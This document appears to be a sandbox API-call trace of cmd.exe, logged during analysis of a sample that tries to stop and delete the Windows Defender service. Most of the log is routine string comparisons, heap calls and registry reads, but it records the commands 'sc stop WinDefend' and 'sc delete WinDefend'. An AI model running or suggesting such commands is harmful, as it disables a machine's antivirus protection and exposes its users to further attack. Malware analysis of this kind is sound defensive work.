	[0027.385] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3
	[0027.385] _wcsicmp (_String1="sc", _String2="DATE") returned 15
	[0027.385] _wcsicmp (_String1="sc", _String2="TIME") returned -1
	[0027.385] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3
	[0027.385] _wcsicmp (_String1="sc", _String2="MD") returned 6
	[0027.385] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6
	[0027.385] _wcsicmp (_String1="sc", _String2="RD") returned 1
	[0027.385] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1
	[0027.385] _wcsicmp (_String1="sc", _String2="PATH") returned 3
	[0027.385] _wcsicmp (_String1="sc", _String2="GOTO") returned 12
	[0027.385] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5
	[0027.385] _wcsicmp (_String1="sc", _String2="CLS") returned 16
	[0027.385] _wcsicmp (_String1="sc", _String2="CALL") returned 16
	[0027.385] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3
	[0027.385] _wcsicmp (_String1="sc", _String2="VER") returned -3
	[0027.385] _wcsicmp (_String1="sc", _String2="VOL") returned -3
	[0027.385] _wcsicmp (_String1="sc", _String2="EXIT") returned 14
	[0027.385] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2
	[0027.385] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14
	[0027.385] _wcsicmp (_String1="sc", _String2="TITLE") returned -1
	[0027.385] _wcsicmp (_String1="sc", _String2="START") returned -17
	[0027.385] _wcsicmp (_String1="sc", _String2="DPATH") returned 15
	[0027.385] _wcsicmp (_String1="sc", _String2="KEYS") returned 8
	[0027.385] _wcsicmp (_String1="sc", _String2="MOVE") returned 6
	[0027.385] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3
	[0027.385] _wcsicmp (_String1="sc", _String2="POPD") returned 3
	[0027.385] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18
	[0027.385] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13
	[0027.385] _wcsicmp (_String1="sc", _String2="BREAK") returned 17
	[0027.385] _wcsicmp (_String1="sc", _String2="COLOR") returned 16
	[0027.385] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6
	[0027.386] _wcsicmp (_String1="sc", _String2="DIR") returned 15
	[0027.386] _wcsicmp (_String1="sc", _String2="ERASE") returned 14
	[0027.386] _wcsicmp (_String1="sc", _String2="DEL") returned 15
	[0027.386] _wcsicmp (_String1="sc", _String2="TYPE") returned -1
	[0027.386] _wcsicmp (_String1="sc", _String2="COPY") returned 16
	[0027.386] _wcsicmp (_String1="sc", _String2="CD") returned 16
	[0027.386] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16
	[0027.386] _wcsicmp (_String1="sc", _String2="RENAME") returned 1
	[0027.386] _wcsicmp (_String1="sc", _String2="REN") returned 1
	[0027.386] _wcsicmp (_String1="sc", _String2="ECHO") returned 14
	[0027.386] _wcsicmp (_String1="sc", _String2="SET") returned -2
	[0027.386] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3
	[0027.386] _wcsicmp (_String1="sc", _String2="DATE") returned 15
	[0027.386] _wcsicmp (_String1="sc", _String2="TIME") returned -1
	[0027.386] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3
	[0027.386] _wcsicmp (_String1="sc", _String2="MD") returned 6
	[0027.386] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6
	[0027.386] _wcsicmp (_String1="sc", _String2="RD") returned 1
	[0027.386] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1
	[0027.386] _wcsicmp (_String1="sc", _String2="PATH") returned 3
	[0027.386] _wcsicmp (_String1="sc", _String2="GOTO") returned 12
	[0027.386] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5
	[0027.386] _wcsicmp (_String1="sc", _String2="CLS") returned 16
	[0027.386] _wcsicmp (_String1="sc", _String2="CALL") returned 16
	[0027.386] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3
	[0027.386] _wcsicmp (_String1="sc", _String2="VER") returned -3
	[0027.386] _wcsicmp (_String1="sc", _String2="VOL") returned -3
	[0027.386] _wcsicmp (_String1="sc", _String2="EXIT") returned 14
	[0027.386] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2
	[0027.386] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14
	[0027.386] _wcsicmp (_String1="sc", _String2="TITLE") returned -1
	[0027.386] _wcsicmp (_String1="sc", _String2="START") returned -17
	[0027.386] _wcsicmp (_String1="sc", _String2="DPATH") returned 15
	[0027.386] _wcsicmp (_String1="sc", _String2="KEYS") returned 8
	[0027.387] _wcsicmp (_String1="sc", _String2="MOVE") returned 6
	[0027.387] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3
	[0027.387] _wcsicmp (_String1="sc", _String2="POPD") returned 3
	[0027.387] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18
	[0027.387] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13
	[0027.387] _wcsicmp (_String1="sc", _String2="BREAK") returned 17
	[0027.387] _wcsicmp (_String1="sc", _String2="COLOR") returned 16
	[0027.387] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6
	[0027.387] _wcsicmp (_String1="sc", _String2="FOR") returned 13
	[0027.387] _wcsicmp (_String1="sc", _String2="IF") returned 10
	[0027.387] _wcsicmp (_String1="sc", _String2="REM") returned 1
	[0027.387] GetProcessHeap () returned 0x490000
	[0027.387] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x210) returned 0x4a2ab8
	[0027.387] GetProcessHeap () returned 0x490000
	[0027.387] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x2e) returned 0x4a2cd0
	[0027.387] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16
	[0027.387] GetProcessHeap () returned 0x490000
	[0027.387] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x418) returned 0x4907f0
	[0027.387] SetErrorMode (uMode=0x0) returned 0x0
	[0027.387] SetErrorMode (uMode=0x1) returned 0x0
	[0027.387] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4907f8, lpFilePart=0x2aef44 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop", lpFilePart=0x2aef44*="Desktop") returned 0x1d
	[0027.387] SetErrorMode (uMode=0x0) returned 0x1
	[0027.388] GetProcessHeap () returned 0x490000
	[0027.388] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x4907f0, Size=0x4a) returned 0x4907f0
	[0027.388] GetProcessHeap () returned 0x490000
	[0027.388] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4907f0) returned 0x4a
	[0027.388] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a080640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0027.388] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0027.388] GetProcessHeap () returned 0x490000
	[0027.388] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x158) returned 0x4a2d08
	[0027.388] GetProcessHeap () returned 0x490000
	[0027.388] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x2a8) returned 0x490848
	[0027.395] GetProcessHeap () returned 0x490000
	[0027.395] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x490848, Size=0x15a) returned 0x490848
	[0027.395] GetProcessHeap () returned 0x490000
	[0027.395] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x490848) returned 0x15a
	[0027.396] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a080640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0027.396] GetProcessHeap () returned 0x490000
	[0027.396] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xe0) returned 0x4a2e68
	[0027.396] GetProcessHeap () returned 0x490000
	[0027.396] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x4a2e68, Size=0x76) returned 0x4a2e68
	[0027.396] GetProcessHeap () returned 0x490000
	[0027.396] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a2e68) returned 0x76
	[0027.397] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0027.397] FindFirstFileExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x2aecc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aecc0) returned 0xffffffff
	[0027.397] GetLastError () returned 0x2
	[0027.397] FindFirstFileExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop\\sc", fInfoLevelId=0x1, lpFindFileData=0x2aecc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aecc0) returned 0xffffffff
	[0027.397] GetLastError () returned 0x2
	[0027.397] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0027.397] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x2aecc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aecc0) returned 0xffffffff
	[0027.398] GetLastError () returned 0x2
	[0027.398] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\sc", fInfoLevelId=0x1, lpFindFileData=0x2aecc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aecc0) returned 0xffffffff
	[0027.398] GetLastError () returned 0x2
	[0027.398] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0027.398] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x2aecc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aecc0) returned 0x4a2ee8
	[0027.398] GetProcessHeap () returned 0x490000
	[0027.398] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x14) returned 0x4a2f28
	[0027.398] FindClose (in: hFindFile=0x4a2ee8 | out: hFindFile=0x4a2ee8) returned 1
	[0027.398] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x2aecc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aecc0) returned 0xffffffff
	[0027.398] GetLastError () returned 0x2
	[0027.398] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aecc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aecc0) returned 0x4a2ee8
	[0027.399] GetProcessHeap () returned 0x490000
	[0027.399] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x4a2f28, Size=0x4) returned 0x4a2f28
	[0027.399] FindClose (in: hFindFile=0x4a2ee8 | out: hFindFile=0x4a2ee8) returned 1
	[0027.399] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0027.399] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0027.399] GetConsoleTitleW (in: lpConsoleTitle=0x2af1b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0027.399] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af040, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af108 | out: lpAttributeList=0x2af040, lpSize=0x2af108) returned 1
	[0027.399] UpdateProcThreadAttribute (in: lpAttributeList=0x2af040, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af100, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af040, lpPreviousValue=0x0) returned 1
	[0027.399] GetStartupInfoW (in: lpStartupInfo=0x2aeffc | out: lpStartupInfo=0x2aeffc*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) 
	[0027.399] GetProcessHeap () returned 0x490000
	[0027.399] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x18) returned 0x4a2ee8
	[0027.399] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38
	[0027.399] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0027.399] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0027.399] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0027.399] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0027.399] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0027.399] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0027.399] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0027.399] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0027.399] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0027.399] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0027.400] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0027.400] GetProcessHeap () returned 0x490000
	[0027.400] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a2ee8 | out: hHeap=0x490000) returned 1
	[0027.400] GetProcessHeap () returned 0x490000
	[0027.400] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa) returned 0x49d5f0
	[0027.400] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1
	[0027.402] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc  stop WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\2XC7u663GxWc\\Desktop", lpStartupInfo=0x2af09c*(cb=0x48, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="sc  stop WinDefend", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af0e8 | out: lpCommandLine="sc  stop WinDefend", lpProcessInformation=0x2af0e8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xdc8, dwThreadId=0xdcc)) returned 1
	[0027.405] CloseHandle (hObject=0x4c) returned 1
	[0027.405] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0027.405] GetProcessHeap () returned 0x490000
	[0027.405] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a1e40 | out: hHeap=0x490000) returned 1
	[0027.406] GetEnvironmentStringsW () returned 0x4a1e40*
	[0027.406] GetProcessHeap () returned 0x490000
	[0027.406] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x98e) returned 0x4a0498
	[0027.406] FreeEnvironmentStringsW (penv=0x4a1e40) returned 1
	[0027.406] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0
	[0027.802] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2aefdc | out: lpExitCode=0x2aefdc*=0x5) returned 1
	[0027.803] CloseHandle (hObject=0x50) returned 1
	[0027.803] _vsnwprintf (in: _Buffer=0x2af124, _BufferCount=0x13, _Format="%08X", _ArgList=0x2aefe8 | out: _Buffer="00000005") returned 8
	[0027.803] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000005") returned 1
	[0027.803] GetProcessHeap () returned 0x490000
	[0027.803] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a0498 | out: hHeap=0x490000) returned 1
	[0027.803] GetEnvironmentStringsW () returned 0x4a2f38*
	[0027.803] GetProcessHeap () returned 0x490000
	[0027.803] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x9b4) returned 0x4a0498
	[0027.803] FreeEnvironmentStringsW (penv=0x4a2f38) returned 1
	[0027.803] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0027.803] GetProcessHeap () returned 0x490000
	[0027.803] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a0498 | out: hHeap=0x490000) returned 1
	[0027.803] GetEnvironmentStringsW () returned 0x4a2f38*
	[0027.803] GetProcessHeap () returned 0x490000
	[0027.803] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x9b4) returned 0x4a0498
	[0027.803] FreeEnvironmentStringsW (penv=0x4a2f38) returned 1
	[0027.803] GetProcessHeap () returned 0x490000
	[0027.803] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x49d5f0 | out: hHeap=0x490000) returned 1
	[0027.803] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af040 | out: lpAttributeList=0x2af040) 
	[0027.803] _get_osfhandle (_FileHandle=1) returned 0x7
	[0027.803] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0027.804] _get_osfhandle (_FileHandle=1) returned 0x7
	[0027.804] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0741ac | out: lpMode=0x4a0741ac) returned 1
	[0027.804] _get_osfhandle (_FileHandle=0) returned 0x3
	[0027.804] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0741b0 | out: lpMode=0x4a0741b0) returned 1
	[0027.804] SetConsoleInputExeNameW () returned 0x1
	[0027.804] GetConsoleOutputCP () returned 0x1b5
	[0027.804] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a074260 | out: lpCPInfo=0x4a074260) returned 1
	[0027.804] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0027.805] exit (_Code=5) 

Process:
	id = "4"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x7ee17660"
	os_pid = "0xd94"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xd50"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c sc delete WinDefend"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\Desktop\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 10
	os_tid = 0xd98

	[0027.269] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2bfe64 | out: lpSystemTimeAsFileTime=0x2bfe64*(dwLowDateTime=0xfccb5ec0, dwHighDateTime=0x1d50a69)) 
	[0027.269] GetCurrentProcessId () returned 0xd94
	[0027.269] GetCurrentThreadId () returned 0xd98
	[0027.269] GetTickCount () returned 0xa600ed
	[0027.269] QueryPerformanceCounter (in: lpPerformanceCount=0x2bfe5c | out: lpPerformanceCount=0x2bfe5c*=10110681499) returned 1
	[0027.270] GetModuleHandleA (lpModuleName=0x0) returned 0x4a050000
	[0027.270] __set_app_type (_Type=0x1) 
	[0027.270] __p__fmode () returned 0x770231f4
	[0027.270] __p__commode () returned 0x770231fc
	[0027.271] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a0721a6) returned 0x0
	[0027.271] __getmainargs (in: _Argc=0x4a074238, _Argv=0x4a074240, _Env=0x4a07423c, _DoWildCard=0, _StartInfo=0x4a074140 | out: _Argc=0x4a074238, _Argv=0x4a074240, _Env=0x4a07423c) returned 0
	[0027.271] GetCurrentThreadId () returned 0xd98
	[0027.271] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd98) returned 0x38
	[0027.271] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0027.271] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadUILanguage") returned 0x76b624c2
	[0027.271] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0027.271] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0027.271] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2bfdf4 | out: phkResult=0x2bfdf4*=0x0) returned 0x2
	[0027.272] VirtualQuery (in: lpAddress=0x2bfe2b, lpBuffer=0x2bfdc4, dwLength=0x1c | out: lpBuffer=0x2bfdc4*(BaseAddress=0x2bf000, AllocationBase=0x1c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0027.272] VirtualQuery (in: lpAddress=0x1c0000, lpBuffer=0x2bfdc4, dwLength=0x1c | out: lpBuffer=0x2bfdc4*(BaseAddress=0x1c0000, AllocationBase=0x1c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c
	[0027.272] VirtualQuery (in: lpAddress=0x1c1000, lpBuffer=0x2bfdc4, dwLength=0x1c | out: lpBuffer=0x2bfdc4*(BaseAddress=0x1c1000, AllocationBase=0x1c0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
	[0027.272] VirtualQuery (in: lpAddress=0x1c3000, lpBuffer=0x2bfdc4, dwLength=0x1c | out: lpBuffer=0x2bfdc4*(BaseAddress=0x1c3000, AllocationBase=0x1c0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0027.272] VirtualQuery (in: lpAddress=0x2c0000, lpBuffer=0x2bfdc4, dwLength=0x1c | out: lpBuffer=0x2bfdc4*(BaseAddress=0x2c0000, AllocationBase=0x2c0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c
	[0027.272] GetConsoleOutputCP () returned 0x1b5
	[0027.272] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a074260 | out: lpCPInfo=0x4a074260) returned 1
	[0027.272] SetConsoleCtrlHandler (HandlerRoutine=0x4a06e72a, Add=1) returned 1
	[0027.272] _get_osfhandle (_FileHandle=1) returned 0x7
	[0027.272] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0027.272] _get_osfhandle (_FileHandle=1) returned 0x7
	[0027.272] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0741ac | out: lpMode=0x4a0741ac) returned 1
	[0027.273] _get_osfhandle (_FileHandle=1) returned 0x7
	[0027.273] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0027.273] _get_osfhandle (_FileHandle=0) returned 0x3
	[0027.273] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0741b0 | out: lpMode=0x4a0741b0) returned 1
	[0027.273] _get_osfhandle (_FileHandle=0) returned 0x3
	[0027.273] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
	[0027.274] GetEnvironmentStringsW () returned 0x3a0288*
	[0027.274] GetProcessHeap () returned 0x390000
	[0027.274] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x932) returned 0x3a0bc8
	[0027.274] FreeEnvironmentStringsW (penv=0x3a0288) returned 1
	[0027.274] GetProcessHeap () returned 0x390000
	[0027.274] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x4) returned 0x3a0108
	[0027.274] GetEnvironmentStringsW () returned 0x3a0288*
	[0027.274] GetProcessHeap () returned 0x390000
	[0027.274] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x932) returned 0x3a1508
	[0027.274] FreeEnvironmentStringsW (penv=0x3a0288) returned 1
	[0027.274] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2bed64 | out: phkResult=0x2bed64*=0x40) returned 0x0
	[0027.274] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2bed6c, lpData=0x2bed70, lpcbData=0x2bed68*=0x1000 | out: lpType=0x2bed6c*=0x0, lpData=0x2bed70*=0x80, lpcbData=0x2bed68*=0x1000) returned 0x2
	[0027.274] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2bed6c, lpData=0x2bed70, lpcbData=0x2bed68*=0x1000 | out: lpType=0x2bed6c*=0x4, lpData=0x2bed70*=0x1, lpcbData=0x2bed68*=0x4) returned 0x0
	[0027.274] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2bed6c, lpData=0x2bed70, lpcbData=0x2bed68*=0x1000 | out: lpType=0x2bed6c*=0x0, lpData=0x2bed70*=0x1, lpcbData=0x2bed68*=0x1000) returned 0x2
	[0027.274] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2bed6c, lpData=0x2bed70, lpcbData=0x2bed68*=0x1000 | out: lpType=0x2bed6c*=0x4, lpData=0x2bed70*=0x0, lpcbData=0x2bed68*=0x4) returned 0x0
